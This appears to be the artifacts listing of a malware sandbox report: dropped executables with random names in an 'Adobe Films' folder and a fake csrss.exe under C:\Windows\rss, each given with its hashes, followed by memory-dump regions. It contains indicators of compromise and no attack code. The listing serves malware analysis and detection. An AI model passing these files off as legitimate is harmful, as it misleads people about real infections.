C:\Users\Admin\Pictures\Adobe Films\iCGcYDTklQlL5864sruYWI4l.exe
MD5
dabae535097a94f593d5afad04acd5ea

SHA1
389a64c4e8c1601fba56576ee261fc953b53ae96

SHA256
e0a33241f5c4ac8f304af0387ddc54da264c0a5101c822d0fc71b10af947b391

SHA512
9846f4529b94b251ed21c9ae0e47ab19814973f62fbf082db845c9c484e79cd9de2523a4471426e721b698ba4a296eb233544035d66ef373c14bdda718730d05

Download Submit
C:\Users\Admin\Pictures\Adobe Films\lFUEJ9JMN_mSnsuwh5qYM9Gl.exe
MD5
7bba73509af24c2e32a00c7d64d4bc76

SHA1
2221ddf6118c0b2eedff1e64e0b12b8992caf67e

SHA256
a8b45b13eaf0d79e4f3ab4e9960dc3f993cd58f338c15f03a45fd7ac3182a9e0

SHA512
07d0029fdc007e8f053c31c844aacb322ce19d046b0c2f27e88100eefd2e4f35e0a6110caf4e93967f8245dcdc4135e6fe468b045bfc4780925fe35eecf76969

Download Submit
C:\Users\Admin\Pictures\Adobe Films\lFUEJ9JMN_mSnsuwh5qYM9Gl.exe
MD5
7bba73509af24c2e32a00c7d64d4bc76

SHA1
2221ddf6118c0b2eedff1e64e0b12b8992caf67e

SHA256
a8b45b13eaf0d79e4f3ab4e9960dc3f993cd58f338c15f03a45fd7ac3182a9e0

SHA512
07d0029fdc007e8f053c31c844aacb322ce19d046b0c2f27e88100eefd2e4f35e0a6110caf4e93967f8245dcdc4135e6fe468b045bfc4780925fe35eecf76969

Download Submit
C:\Users\Admin\Pictures\Adobe Films\n9kuCWbwTpyuOMtLZUnGC8gy.exe
MD5
775e93f6d7f4219a9b2a895af53e1765

SHA1
65528927a1e83b59848a6a03baaf6ccfa85137ae

SHA256
e5df2d6a56f0f2627289b5c8b2740097a0b823f7a4a263d17dde31a0216f0767

SHA512
57edf3145f251a2c4fb10894b8c00fb84d6f2daee6e2fb6228a16212ba5b784d214373843aada2c7e5fcc7957ff57a6a6b0b8dcb353b500831dcbec5bee0ef31

Download Submit
C:\Users\Admin\Pictures\Adobe Films\n9kuCWbwTpyuOMtLZUnGC8gy.exe
MD5
775e93f6d7f4219a9b2a895af53e1765

SHA1
65528927a1e83b59848a6a03baaf6ccfa85137ae

SHA256
e5df2d6a56f0f2627289b5c8b2740097a0b823f7a4a263d17dde31a0216f0767

SHA512
57edf3145f251a2c4fb10894b8c00fb84d6f2daee6e2fb6228a16212ba5b784d214373843aada2c7e5fcc7957ff57a6a6b0b8dcb353b500831dcbec5bee0ef31

Download Submit
C:\Users\Admin\Pictures\Adobe Films\oumII6Q2avjuk0Ds5DVeqcBh.exe
MD5
d432d82dfedd999b3d6b7cec3f6f5985

SHA1
fb0ea0f2d178d8aa91f989ee936b875a6e01ca92

SHA256
432a96e7a625d04b2d13d4874c6137dbd8c305e2133d0792b969520fe4a1f06b

SHA512
2b23ff0cd3d0f328aa742501ad55c4ec09dd85f7dbf7a6e1d06283e4d0279b7b6e4f96b4be6118ed0d1fadc007cc960bd77ce5199f80b2cd9535081b1407074a

Download Submit
C:\Users\Admin\Pictures\Adobe Films\oumII6Q2avjuk0Ds5DVeqcBh.exe
MD5
d432d82dfedd999b3d6b7cec3f6f5985

SHA1
fb0ea0f2d178d8aa91f989ee936b875a6e01ca92

SHA256
432a96e7a625d04b2d13d4874c6137dbd8c305e2133d0792b969520fe4a1f06b

SHA512
2b23ff0cd3d0f328aa742501ad55c4ec09dd85f7dbf7a6e1d06283e4d0279b7b6e4f96b4be6118ed0d1fadc007cc960bd77ce5199f80b2cd9535081b1407074a

Download Submit
C:\Users\Admin\Pictures\Adobe Films\qevwR0y5gSj_fLxDoqCOS04H.exe
MD5
8446d7818c5a7fff6839fe4be176f88e

SHA1
b094ebde855d752565f9fce2ddfb93b264060904

SHA256
c83b17d316e93347d1a282646c5eb340662c9a51e38f7ea4a233f8f23fe59652

SHA512
f10e7c5bdf076278c678a860b413774a930996211dcd0dee96b323d56761207a08e7da5ffdaa33dc3a1f03738aad86cf855f48d8b70c72ff8b796ace3eb6c42d

Download Submit
C:\Users\Admin\Pictures\Adobe Films\qevwR0y5gSj_fLxDoqCOS04H.exe
MD5
8446d7818c5a7fff6839fe4be176f88e

SHA1
b094ebde855d752565f9fce2ddfb93b264060904

SHA256
c83b17d316e93347d1a282646c5eb340662c9a51e38f7ea4a233f8f23fe59652

SHA512
f10e7c5bdf076278c678a860b413774a930996211dcd0dee96b323d56761207a08e7da5ffdaa33dc3a1f03738aad86cf855f48d8b70c72ff8b796ace3eb6c42d

Download Submit
C:\Windows\rss\csrss.exe
MD5
907b8a8bacc5432518151b830339539d

SHA1
9d5a934d1291db04f88482e2c3e5f3053552e044

SHA256
61727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f

SHA512
8129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622

Download Submit
C:\Windows\rss\csrss.exe
MD5
907b8a8bacc5432518151b830339539d

SHA1
9d5a934d1291db04f88482e2c3e5f3053552e044

SHA256
61727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f

SHA512
8129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622

Download Submit
memory/380-273-0x000000000058E000-0x00000000005B5000-memory.dmp

Filesize
156KB

Download
memory/380-263-0x000000000058E000-0x00000000005B5000-memory.dmp

Filesize
156KB

Download
memory/604-283-0x0000000071F70000-0x0000000072720000-memory.dmp

Filesize
7.7MB

Download
memory/1224-132-0x0000000000910000-0x000000000093C000-memory.dmp

Filesize
176KB

Download
memory/1224-138-0x00007FF9A6AB0000-0x00007FF9A7571000-memory.dmp

Filesize
10.8MB

Download
memory/1432-245-0x0000000000589000-0x0000000000597000-memory.dmp

Filesize
56KB

Download
memory/1512-308-0x0000000000400000-0x0000000000636000-memory.dmp

Filesize
2.2MB

Download
memory/1928-260-0x0000000000D70000-0x0000000000D72000-memory.dmp

Filesize
8KB

Download
memory/1928-246-0x00007FF9A6280000-0x00007FF9A6D41000-memory.dmp

Filesize
10.8MB

Download
memory/1928-242-0x00000000008A0000-0x00000000008CE000-memory.dmp

Filesize
184KB

Download
memory/1996-176-0x0000000002E00000-0x000000000323D000-memory.dmp

Filesize
4.2MB

Download
memory/1996-177-0x0000000000400000-0x0000000002584000-memory.dmp

Filesize
33.5MB

Download
memory/2028-259-0x0000000075030000-0x00000000750B9000-memory.dmp

Filesize
548KB

Download
memory/2028-244-0x0000000000480000-0x00000000007C5000-memory.dmp

Filesize
3.3MB

Download
memory/2028-276-0x0000000075450000-0x000000007549C000-memory.dmp

Filesize
304KB

Download
memory/2028-265-0x0000000076D20000-0x00000000772D3000-memory.dmp

Filesize
5.7MB

Download
memory/2028-250-0x0000000000480000-0x00000000007C5000-memory.dmp

Filesize
3.3MB

Download
memory/2028-175-0x0000000000400000-0x0000000000682000-memory.dmp

Filesize
2.5MB

Download
memory/2028-247-0x0000000076150000-0x0000000076365000-memory.dmp

Filesize
2.1MB

Download
memory/2028-234-0x0000000002760000-0x00000000027A6000-memory.dmp

Filesize
280KB

Download
memory/2028-237-0x0000000000480000-0x00000000007C5000-memory.dmp

Filesize
3.3MB

Download
memory/2028-240-0x0000000000C80000-0x0000000000C81000-memory.dmp

Filesize
4KB

Download
memory/2028-169-0x0000000005090000-0x0000000005098000-memory.dmp

Filesize
32KB

Download
memory/2028-239-0x0000000000480000-0x00000000007C5000-memory.dmp

Filesize
3.3MB

Download
memory/2076-270-0x0000000071F70000-0x0000000072720000-memory.dmp

Filesize
7.7MB

Download
memory/2076-278-0x0000000005730000-0x0000000005731000-memory.dmp

Filesize
4KB

Download
memory/2076-266-0x0000000000CA0000-0x0000000000CB8000-memory.dmp

Filesize
96KB

Download
memory/2328-238-0x0000000075030000-0x00000000750B9000-memory.dmp

Filesize
548KB

Download
memory/2328-233-0x0000000000C80000-0x0000000000EC5000-memory.dmp

Filesize
2.3MB

Download
memory/2328-229-0x0000000000660000-0x0000000000661000-memory.dmp

Filesize
4KB

Download
memory/2328-254-0x0000000071F70000-0x0000000072720000-memory.dmp

Filesize
7.7MB

Download
memory/2328-236-0x0000000000C80000-0x0000000000EC5000-memory.dmp

Filesize
2.3MB

Download
memory/2328-248-0x0000000004F70000-0x0000000004F71000-memory.dmp

Filesize
4KB

Download
memory/2328-264-0x0000000076D20000-0x00000000772D3000-memory.dmp

Filesize
5.7MB

Download
memory/2328-199-0x0000000000C80000-0x0000000000EC5000-memory.dmp

Filesize
2.3MB

Download
memory/2328-252-0x0000000002BD0000-0x0000000002BD1000-memory.dmp

Filesize
4KB

Download
memory/2328-217-0x0000000076150000-0x0000000076365000-memory.dmp

Filesize
2.1MB

Download
memory/2328-212-0x0000000000C80000-0x0000000000EC5000-memory.dmp

Filesize
2.3MB

Download
memory/2328-215-0x0000000000C80000-0x0000000000EC5000-memory.dmp

Filesize
2.3MB

Download
memory/2328-201-0x0000000000C80000-0x0000000000EC5000-memory.dmp

Filesize
2.3MB

Download
memory/2328-277-0x0000000075450000-0x000000007549C000-memory.dmp

Filesize
304KB

Download
memory/2328-206-0x0000000000B00000-0x0000000000B46000-memory.dmp

Filesize
280KB

Download
memory/2328-207-0x0000000000460000-0x0000000000461000-memory.dmp

Filesize
4KB

Download
memory/2456-168-0x0000000002EB0000-0x00000000037D7000-memory.dmp

Filesize
9.2MB

Download
memory/2456-170-0x0000000000400000-0x0000000002584000-memory.dmp

Filesize
33.5MB

Download
memory/2456-167-0x0000000002A69000-0x0000000002EA6000-memory.dmp

Filesize
4.2MB

Download
memory/2664-185-0x0000000005D64000-0x0000000005D66000-memory.dmp

Filesize
8KB

Download
memory/2664-180-0x0000000000400000-0x000000000179C000-memory.dmp

Filesize
19.6MB

Download
memory/2664-178-0x000000000192D000-0x0000000001950000-memory.dmp

Filesize
140KB

Download
memory/2664-154-0x0000000005D70000-0x0000000006314000-memory.dmp

Filesize
5.6MB

Download
memory/2664-155-0x0000000006320000-0x0000000006938000-memory.dmp

Filesize
6.1MB

Download
memory/2664-159-0x0000000006AC0000-0x0000000006AFC000-memory.dmp

Filesize
240KB

Download
memory/2664-179-0x00000000033B0000-0x00000000033E0000-memory.dmp

Filesize
192KB

Download
memory/2664-182-0x0000000005D60000-0x0000000005D61000-memory.dmp

Filesize
4KB

Download
memory/2664-184-0x0000000005D63000-0x0000000005D64000-memory.dmp

Filesize
4KB

Download
memory/2664-158-0x00000000069B0000-0x0000000006ABA000-memory.dmp

Filesize
1.0MB

Download
memory/2664-157-0x0000000006990000-0x00000000069A2000-memory.dmp

Filesize
72KB

Download
memory/2664-181-0x0000000071F70000-0x0000000072720000-memory.dmp

Filesize
7.7MB

Download
memory/2664-149-0x000000000192D000-0x0000000001950000-memory.dmp

Filesize
140KB

Download
memory/2664-183-0x0000000005D62000-0x0000000005D63000-memory.dmp

Filesize
4KB

Download
memory/2712-186-0x0000000000BF0000-0x0000000000C05000-memory.dmp

Filesize
84KB

Download
memory/3508-249-0x0000000002150000-0x00000000021B0000-memory.dmp

Filesize
384KB

Download
memory/3808-261-0x0000000002BBE000-0x0000000002C0E000-memory.dmp

Filesize
320KB

Download
memory/3808-262-0x00000000047D0000-0x0000000004862000-memory.dmp

Filesize
584KB

Download
memory/3808-269-0x0000000000400000-0x0000000002B57000-memory.dmp

Filesize
39.3MB

Download
memory/3808-258-0x0000000002BBE000-0x0000000002C0E000-memory.dmp

Filesize
320KB

Download
memory/3848-173-0x00000000029DD000-0x0000000002E1A000-memory.dmp

Filesize
4.2MB

Download
memory/3848-174-0x0000000000400000-0x0000000002584000-memory.dmp

Filesize
33.5MB

Download
memory/3928-268-0x0000000000960000-0x0000000000C9C000-memory.dmp

Filesize
3.2MB

Download
memory/3928-272-0x0000000000940000-0x0000000000942000-memory.dmp

Filesize
8KB

Download
memory/3928-267-0x0000000000960000-0x0000000000C9C000-memory.dmp

Filesize
3.2MB

Download
memory/3928-281-0x0000000000F10000-0x0000000000F12000-memory.dmp

Filesize
8KB

Download
memory/4204-256-0x00000000005F9000-0x0000000000665000-memory.dmp

Filesize
432KB

Download
memory/4204-253-0x00000000005F9000-0x0000000000665000-memory.dmp

Filesize
432KB

Download
memory/4204-257-0x00000000021A0000-0x000000000224C000-memory.dmp

Filesize
688KB

Download
memory/4204-271-0x0000000000400000-0x0000000000534000-memory.dmp

Filesize
1.2MB

Download
memory/4248-189-0x00000000041C0000-0x000000000437E000-memory.dmp

Filesize
1.7MB

Download
memory/4332-300-0x0000000000FC0000-0x0000000000FC1000-memory.dmp

Filesize
4KB

Download
memory/4332-327-0x0000000076150000-0x0000000076365000-memory.dmp

Filesize
2.1MB

Download
memory/4332-340-0x0000000076D20000-0x00000000772D3000-memory.dmp

Filesize
5.7MB

Download
memory/4332-361-0x0000000075450000-0x000000007549C000-memory.dmp

Filesize
304KB

Download
memory/4332-335-0x0000000075030000-0x00000000750B9000-memory.dmp

Filesize
548KB

Download
memory/4528-255-0x0000000000770000-0x00000000007D0000-memory.dmp

Filesize
384KB

Download
memory/4768-279-0x0000000071F70000-0x0000000072720000-memory.dmp

Filesize
7.7MB

Download
memory/4824-148-0x00000000023ED000-0x00000000023F6000-memory.dmp

Filesize
36KB

Download
memory/4824-163-0x0000000002250000-0x0000000002259000-memory.dmp

Filesize
36KB

Download
memory/4824-164-0x0000000000400000-0x000000000214D000-memory.dmp

Filesize
29.3MB

Download
memory/4824-162-0x00000000023ED000-0x00000000023F6000-memory.dmp

Filesize
36KB

Download
memory/4856-275-0x0000000071F70000-0x0000000072720000-memory.dmp

Filesize
7.7MB

Download
memory/4856-282-0x00000000054E0000-0x0000000005B08000-memory.dmp

Filesize
6.2MB

Download
memory/4856-274-0x0000000004DC0000-0x0000000004DF6000-memory.dmp

Filesize
216KB

Download
memory/4856-280-0x0000000004EA0000-0x0000000004EA1000-memory.dmp

Filesize
4KB

Download
memory/5068-251-0x0000000002110000-0x0000000002170000-memory.dmp

Filesize
384KB

Download
memory/5180-329-0x0000000076150000-0x0000000076365000-memory.dmp

Filesize
2.1MB

Download
memory/5180-342-0x0000000076D20000-0x00000000772D3000-memory.dmp

Filesize
5.7MB

Download
memory/5180-336-0x0000000075030000-0x00000000750B9000-memory.dmp

Filesize
548KB

Download
memory/5180-362-0x0000000075450000-0x000000007549C000-memory.dmp

Filesize
304KB

Download
memory/5180-320-0x0000000000DE0000-0x0000000000DE1000-memory.dmp

Filesize
4KB

Download
memory/5652-343-0x0000000010000000-0x0000000010D56000-memory.dmp

Filesize
13.3MB

Download
memory/5952-349-0x0000000000B20000-0x0000000000E52000-memory.dmp

Filesize
3.2MB

Download
memory/5952-373-0x0000000075030000-0x00000000750B9000-memory.dmp

Filesize
548KB

Download
memory/5952-377-0x0000000076D20000-0x00000000772D3000-memory.dmp

Filesize
5.7MB

Download
memory/5952-385-0x0000000075450000-0x000000007549C000-memory.dmp

Filesize
304KB

Download
memory/5952-364-0x0000000076150000-0x0000000076365000-memory.dmp

Filesize
2.1MB

Download
memory/5952-360-0x0000000000740000-0x0000000000741000-memory.dmp

Filesize
4KB

Download
memory/5952-347-0x0000000000B20000-0x0000000000E52000-memory.dmp

Filesize
3.2MB

Download
memory/6032-354-0x0000000001300000-0x0000000001301000-memory.dmp

Filesize
4KB

Download
memory/6032-372-0x0000000075030000-0x00000000750B9000-memory.dmp

Filesize
548KB

Download
memory/6032-375-0x0000000076D20000-0x00000000772D3000-memory.dmp

Filesize
5.7MB

Download
memory/6032-363-0x0000000076150000-0x0000000076365000-memory.dmp

Filesize
2.1MB

Download
memory/6032-359-0x00000000006D0000-0x00000000008D0000-memory.dmp

Filesize
2.0MB

Download